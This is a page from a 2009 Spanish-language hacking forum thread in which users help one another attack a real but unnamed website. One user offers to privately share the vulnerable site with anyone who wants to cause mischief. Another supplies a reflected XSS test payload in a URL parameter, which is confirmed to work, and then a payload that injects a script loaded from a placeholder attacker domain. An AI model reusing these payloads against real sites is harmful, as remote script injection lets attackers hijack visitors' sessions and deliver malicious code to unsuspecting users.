elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Necesito ayuda con inyeccion por PHP
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Necesito ayuda con inyeccion por PHP  (Leído 7,534 veces)
Jubjub


Desconectado Desconectado

Mensajes: 708


Lay Ladie lay,...


Ver Perfil WWW
Re: Necesito ayuda con inyeccion por PHP
« Respuesta #10 en: 25 Agosto 2009, 20:23 pm »

No se puede inyectar php mas que en funciones eval ()
En línea

Jugando con Fósforoshacking con un tono diferente


.
porno
Skeletron


Desconectado Desconectado

Mensajes: 1.731


A long way to go


Ver Perfil WWW
Re: Necesito ayuda con inyeccion por PHP
« Respuesta #11 en: 25 Agosto 2009, 20:51 pm »

Buen punto... Muchas gracias..

Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..

Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...
En línea

Og.


Desconectado Desconectado

Mensajes: 822


Aprendiendo de la vida


Ver Perfil
Re: Necesito ayuda con inyeccion por PHP
« Respuesta #12 en: 26 Agosto 2009, 03:04 am »

Buen punto... Muchas gracias..

Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..

Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...
nop xD

Código:
<script src=http://tudominio/tuscript.js ></script>

Saludos!
En línea

|-
Skeletron


Desconectado Desconectado

Mensajes: 1.731


A long way to go


Ver Perfil WWW
Re: Necesito ayuda con inyeccion por PHP
« Respuesta #13 en: 26 Agosto 2009, 03:09 am »

Y eso amigo??? donde lo queres meter?
Acordate que todo ésto está dentro de un campo IMG
En línea

Og.


Desconectado Desconectado

Mensajes: 822


Aprendiendo de la vida


Ver Perfil
Re: Necesito ayuda con inyeccion por PHP
« Respuesta #14 en: 26 Agosto 2009, 03:24 am »

hola, mira es algo asi como un html inyection o Xss, proba con http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script>alert(05)</script>

si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir

saludps
Si, el 1º dió el aviso de "5" en una alerta...

Buscaré algo de crosscripting..
entonces:

Código:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script src=http://tudominio/tuscript.js ></script>

saludos!
En línea

|-
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines